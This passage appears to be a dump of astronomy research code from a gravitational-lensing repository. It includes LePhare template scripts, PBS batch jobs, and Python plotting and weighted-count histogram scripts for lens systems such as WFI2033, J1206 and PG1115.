-t G -GAL_LIB_IN LIB_CWW_CFHTLS_NEW -GAL_LIB_OUT MAG_CWW_CFHTLS_NEW -MOD_EXTINC 38,100 -EXTINC_LAW SMC_prevot.dat -EB_V 0.000,0.05,0.1,0.15,0.2\n\n#CWW - COSMOS\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_COSMOS -GAL_SED $LEPHAREDIR/sed/GAL/COSMOS_SED/COSMOS_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW_COSMOS -GAL_LIB_OUT MAG_CWW_COSMOS -MOD_EXTINC 13,23,23,31,23,31,23,31 -EXTINC_LAW SMC_prevot.dat,SB_calzetti.dat,SB_calzetti_bump1.dat,SB_calzetti_bump2.dat -EB_V 0.000,0.100,0.200,0.300,0.400,0.500\n\n#Bruzual & Charlot - Atsushi\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/HYPERZ/HYPERZ_GIS_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_HSC/AGE_GISSEL_HZ.dat\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03\n\n#Bruzual & Charlot - phys para\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03 -EXTINC_LAW calzetti.dat -EB_V 0.,0.05,0.1,0.15,0.2,0.25,0.3 -MOD_EXTINC 0,100\n\n#Bruzual & Charlot - phys para for me, to be able to run without recompiling\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03 -EXTINC_LAW calzetti.dat -EB_V 0.,0.1,0.2,0.3,0.4,0.5 -MOD_EXTINC 0,100\n\n#Bruzual & Charlot - Ilbert et al. 2009\n$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03_I09 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_I09_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03_I09 -GAL_LIB_OUT MAG_BC03_I09 -EXTINC_LAW calzetti.dat -EB_V 0.,0.1,0.2,0.3,0.4,0.5 -MOD_EXTINC 0,20\n\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03_NO_EXT -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03_NO_EXT -GAL_LIB_OUT MAG_BC03_NO_EXT -EB_V 0.\n\n#Star templates ---------------------------------#\n$LEPHAREDIR/source/sedtolib -c $PARA -t S -STAR_LIB LIB_STAR -STAR_SED $LEPHAREDIR/sed/STAR/STAR_MOD.list\n$LEPHAREDIR/source/mag_star -c $PARA -t Q -STAR_LIB_IN LIB_STAR -STAR_LIB_OUT MAG_STAR\n\n#QSO templates ----------------------------------#\n$LEPHAREDIR/source/sedtolib -c $PARA -t Q -QSO_LIB LIB_QSO -QSO_SED $LEPHAREDIR/sed/QSO/QSO_MOD.list\n$LEPHAREDIR/source/mag_gal -c $PARA -t Q -QSO_LIB_IN LIB_QSO -QSO_LIB_OUT MAG_QSO\n" }, { "alpha_fraction": 0.5549174547195435, "alphanum_fraction": 0.6762383580207825, "avg_line_length": 43.935482025146484, "blob_id": "b7a0d9aaf7f7dcecfd783621f367f256e0850d5c", "content_id": "62b9660288083de88c6c12d74b1542598528e546", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 109, "num_lines": 31, "path": "/python/plot_utilities/plotkappazeta.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#\n\nimport pylab as plt\nimport numpy as np\n\nfile = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappadependencezeta/medstd.dat'\ndata = np.loadtxt(file,usecols=[1])\nmag = np.array([22.5,23,23.5,24])\nkappa45zeta05 = np.array([data[1],data[19],data[20],data[13]])\nkappa45zeta1 = np.array([data[5],data[6],data[7],data[18]])\nkappa45zeta15 = np.array([data[3],data[12],data[14],data[21]])\nkappa120zeta05 = np.array([data[4],data[9],data[11],data[15]])\nkappa120zeta1 = np.array([data[2],data[22],data[17],data[10]])\nkappa120zeta15 = np.array([data[0],data[16],data[23],data[8]])\nplt.clf()\nplt.plot(mag,kappa45zeta05,label='45 $\\zeta=0.5$',color='b')\nplt.plot(mag,kappa45zeta1,label='45 $\\zeta=1.0$',color='k')\nplt.plot(mag,kappa45zeta15,label='45 $\\zeta=1.5$',color='r')\nplt.plot(mag,kappa120zeta05,label='120 $\\zeta=0.5$',linestyle='-.',color='b')\nplt.plot(mag,kappa120zeta1,label='120 $\\zeta=1.0$',linestyle='-.',color='k')\nplt.plot(mag,kappa120zeta15,label='120 $\\zeta=1.5$',linestyle='-.',color='r')\n\n#plt.plot(kappa_values[:-1][::1],kappa_1[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$', linestyle='-.')\nplt.xlabel(r'mag', fontsize=20)\nplt.xlim([22.5,24])\n#plt.set_xticklabels([22.5,23,23.5,24])\nplt.ylabel(r'$\\kappa_\\mathrm{med}$', fontsize=20)\nplt.legend(loc=\"lower right\")\nplt.xticks(np.linspace(22.5,24,4))\n#plt.show()\nplt.savefig('%s.png' % file[:-4], dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5834031701087952, "alphanum_fraction": 0.7443419694900513, "avg_line_length": 48.70833206176758, "blob_id": "96af98d1ed44b479823d7cb0d01fa53b1d7ae291", "content_id": "201315190a815ae4242147aaaf02ff730c38a25d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1193, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": "/python/scripts/NAOJ/batch3_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3_.out\n#PBS -e Logb3_.err\n#PBS -N 3_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "31ef8157b1ec10ae1726b382a4549cf84a279c81", "content_id": "6ba69c793f332dcd28e5207354d8e113b68ee1fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch1_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb1.out\n#PBS -e Logb1.err\n#PBS -N 1\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5201928615570068, "alphanum_fraction": 0.6232945322990417, "avg_line_length": 64.63581848144531, "blob_id": "8e8dc8e39888bd80217d939e6e636c1eafe793d3", "content_id": "2232acb85803c54d058f23c005027f0d969fce87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21988, "license_type": "no_license", "max_line_length": 351, "num_lines": 335, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samples.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, Feb 13 2018\n# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta_WFI2033rethought.py to produce histograms and compute the 16th, 50th and 84th percentiles, using the 10 samples\n# run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_samples.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 removegrouphandpicked testduplicatesamples/testothersamples\n# After running this code, you need to combine the results into a final text file with the final distributions and widths, using weightinguniversal_histograms_finalcombine.py\n# If desired, run weightinguniversal_histograms_samples_publicationqualitynotext.py to produce a publication quality plot\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\ntry: specialtest = '_'+str(sys.argv[13])\nexcept: specialtest = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 8\nfontlabel = 2\npltrange = 3\nsamples = 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/%s' %(nr,samples-1)\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n\n if mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\n if mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\n if mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\n if mag == \"23\" and photz == \"eazy\": cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n\n print \"W1...\"\n for i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n #print np.shape(q_W1_50read)\n for i in range(len(lstW1_75)):\n if i == 0:\n q_W1_75read = np.loadtxt(root+lstW1_75[i], usecols=cols, unpack=True)\n else:\n q_W1_75read = np.r_['1',q_W1_75read,np.loadtxt(root+ lstW1_75[i], usecols=cols, unpack=True)]\n\n print \"W2...\"\n for i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW2_75)):\n if i == 0:\n q_W2_75read = np.loadtxt(root+lstW2_75[i], usecols=cols, unpack=True)\n else:\n q_W2_75read = np.r_['1',q_W2_75read,np.loadtxt(root+ lstW2_75[i], usecols=cols, unpack=True)]\n\n print \"W3...\"\n for i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW3_75)):\n if i == 0:\n q_W3_75read = np.loadtxt(root+lstW3_75[i], usecols=cols, unpack=True)\n else:\n q_W3_75read = np.r_['1',q_W3_75read,np.loadtxt(root+ lstW3_75[i], usecols=cols, unpack=True)]\n\n print \"W4...\"\n for i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW4_75)):\n if i == 0:\n q_W4_75read = np.loadtxt(root+lstW4_75[i], usecols=cols, unpack=True)\n else:\n q_W4_75read = np.r_['1',q_W4_75read,np.loadtxt(root+ lstW4_75[i], usecols=cols, unpack=True)]\n\n for j in range(18):\n q_W1_50 = q_W1_50read[j][q_W1_50read[j] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50)\n q_W1_75 = q_W1_75read[j][q_W1_75read[j] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[j][q_W2_50read[j] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n q_W2_75 = q_W2_75read[j][q_W2_75read[j] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[j][q_W3_50read[j] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n q_W3_75 = q_W3_75read[j][q_W3_75read[j] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[j][q_W4_50read[j] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n q_W4_75 = q_W4_75read[j][q_W4_75read[j] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n if mode == \"sum\":\n medsum50W1[j][nr] = np.average(q_W1_50)\n medsum75W1[j][nr] = np.average(q_W1_75)\n medsum50W2[j][nr] = np.average(q_W2_50)\n medsum75W2[j][nr] = np.average(q_W2_75)\n medsum50W3[j][nr] = np.average(q_W3_50)\n medsum75W3[j][nr] = np.average(q_W3_75)\n medsum50W4[j][nr] = np.average(q_W4_50)\n medsum75W4[j][nr] = np.average(q_W4_75)\n if mode == \"meds\":\n medsum50W1[j][nr] = np.median(q_W1_50)\n medsum75W1[j][nr] = np.median(q_W1_75)\n medsum50W2[j][nr] = np.median(q_W2_50)\n medsum75W2[j][nr] = np.median(q_W2_75)\n medsum50W3[j][nr] = np.median(q_W3_50)\n medsum75W3[j][nr] = np.median(q_W3_75)\n medsum50W4[j][nr] = np.median(q_W4_50)\n medsum75W4[j][nr] = np.median(q_W4_75)\n\nstd50W1_inf = np.zeros(18)\nstd50W1_sup = np.zeros(18)\nstd50W2_inf = np.zeros(18)\nstd50W2_sup = np.zeros(18)\nstd50W3_inf = np.zeros(18)\nstd50W3_sup = np.zeros(18)\nstd50W4_inf = np.zeros(18)\nstd50W4_sup = np.zeros(18)\nstd75W1_inf = np.zeros(18)\nstd75W1_sup = np.zeros(18)\nstd75W2_inf = np.zeros(18)\nstd75W2_sup = np.zeros(18)\nstd75W3_inf = np.zeros(18)\nstd75W3_sup = np.zeros(18)\nstd75W4_inf = np.zeros(18)\nstd75W4_sup = np.zeros(18)\nstd_inf = np.zeros(18)\nstd_sup = np.zeros(18)\n\nfor i in range(18):\n std50W1_inf[i] = np.percentile(medsum50W1[i], 16)\n std50W1_sup[i] = np.percentile(medsum50W1[i], 84)\n std50W2_inf[i] = np.percentile(medsum50W2[i], 16)\n std50W2_sup[i] = np.percentile(medsum50W2[i], 84)\n std50W3_inf[i] = np.percentile(medsum50W3[i], 16)\n std50W3_sup[i] = np.percentile(medsum50W3[i], 84)\n std50W4_inf[i] = np.percentile(medsum50W4[i], 16)\n std50W4_sup[i] = np.percentile(medsum50W4[i], 84)\n std75W1_inf[i] = np.percentile(medsum75W1[i], 16)\n std75W1_sup[i] = np.percentile(medsum75W1[i], 84)\n std75W2_inf[i] = np.percentile(medsum75W2[i], 16)\n std75W2_sup[i] = np.percentile(medsum75W2[i], 84)\n std75W3_inf[i] = np.percentile(medsum75W3[i], 16)\n std75W3_sup[i] = np.percentile(medsum75W3[i], 84)\n std75W4_inf[i] = np.percentile(medsum75W4[i], 16)\n std75W4_sup[i] = np.percentile(medsum75W4[i], 84)\n std_inf[i] = np.percentile([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]], 16)\n std_sup[i] = np.percentile([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]], 84)\n\nprint \"Plotting...\"\n\nplt.suptitle(r'%s weighted counts histogram W1-W4 %s arcsec %s inner %s %s %s %s %s %s zgap %s %s' % (lens, radius, inner, mag, mode, photz, irac, detect, handpicked, zinf, zsup), fontsize=fontsize, y=0.998)\n\nfor i in range(18):\n if i == 0: ax=plt.subplot(5,4,1)\n if i == 1: ax=plt.subplot(5,4,2)\n if i == 2: ax=plt.subplot(5,4,3)\n if i == 3: ax=plt.subplot(5,4,4)\n if i == 4: ax=plt.subplot(5,4,5)\n if i == 5: ax=plt.subplot(5,4,6)\n if i == 6: ax=plt.subplot(5,4,7)\n if i == 7: ax=plt.subplot(5,4,8)\n if i == 8: ax=plt.subplot(5,4,9)\n if i == 9: ax=plt.subplot(5,4,10)\n if i == 10: ax=plt.subplot(5,4,11)\n if i == 11: ax=plt.subplot(5,4,12)\n if i == 12: ax=plt.subplot(5,4,13)\n if i == 13: ax=plt.subplot(5,4,14)\n if i == 14: ax=plt.subplot(5,4,15)\n if i == 15: ax=plt.subplot(5,4,17)\n if i == 16: ax=plt.subplot(5,4,18)\n if i == 17: ax=plt.subplot(5,4,19)\n\n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[i][q_W1_75read[i] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n q_W2_75 = q_W2_75read[i][q_W2_75read[i] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n q_W3_75 = q_W3_75read[i][q_W3_75read[i] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[i][q_W4_50read[i] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n q_W4_75 = q_W4_75read[i][q_W4_75read[i] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n\n if mode == \"sum\":\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W1[i][0],np.average(medsum50W1[i]),std50W1_inf[i],std50W1_sup[i],medsum75W1[i][0],np.average(medsum75W1[i]),std75W1_inf[i],std75W1_sup[i]) # init refers to the zeroth sample, all to all samples combined\n ax.text(0.02, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W2[i][0],np.average(medsum50W2[i]),std50W2_inf[i],std50W2_sup[i],medsum75W2[i][0],np.average(medsum75W2[i]),std75W2_inf[i],std75W2_sup[i])\n ax.text(0.02, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W3[i][0],np.average(medsum50W3[i]),std50W3_inf[i],std50W3_sup[i],medsum75W3[i][0],np.average(medsum75W3[i]),std75W3_inf[i],std75W3_sup[i])\n ax.text(0.02, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W4[i][0],np.average(medsum50W4[i]),std50W4_inf[i],std50W4_sup[i],medsum75W4[i][0],np.average(medsum75W4[i]),std75W4_inf[i],std75W4_sup[i])\n ax.text(0.02, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 init %.3f all %.3f (%.3f %.3f)\" % (np.average([medsum50W1[i][0],medsum50W2[i][0],medsum50W3[i][0],medsum50W4[i][0],medsum75W1[i][0],medsum75W2[i][0],medsum75W3[i][0],medsum75W4[i][0]]),np.average([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]]),std_inf[i],std_sup[i])\n ax.text(0.02, 0.1, s, fontsize=fontlabel+1, color='k',transform=ax.transAxes)\n if mode == \"meds\":\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W1[i][0],np.median(medsum50W1[i]),std50W1_inf[i],std50W1_sup[i],medsum75W1[i][0],np.median(medsum75W1[i]),std75W1_inf[i],std75W1_sup[i]) # init refers to the zeroth sample, all to all samples combined\n ax.text(0.02, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W2[i][0],np.median(medsum50W2[i]),std50W2_inf[i],std50W2_sup[i],medsum75W2[i][0],np.median(medsum75W2[i]),std75W2_inf[i],std75W2_sup[i])\n ax.text(0.02, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W3[i][0],np.median(medsum50W3[i]),std50W3_inf[i],std50W3_sup[i],medsum75W3[i][0],np.median(medsum75W3[i]),std75W3_inf[i],std75W3_sup[i])\n ax.text(0.02, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W4[i][0],np.median(medsum50W4[i]),std50W4_inf[i],std50W4_sup[i],medsum75W4[i][0],np.median(medsum75W4[i]),std75W4_inf[i],std75W4_sup[i])\n ax.text(0.02, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 init %.3f all 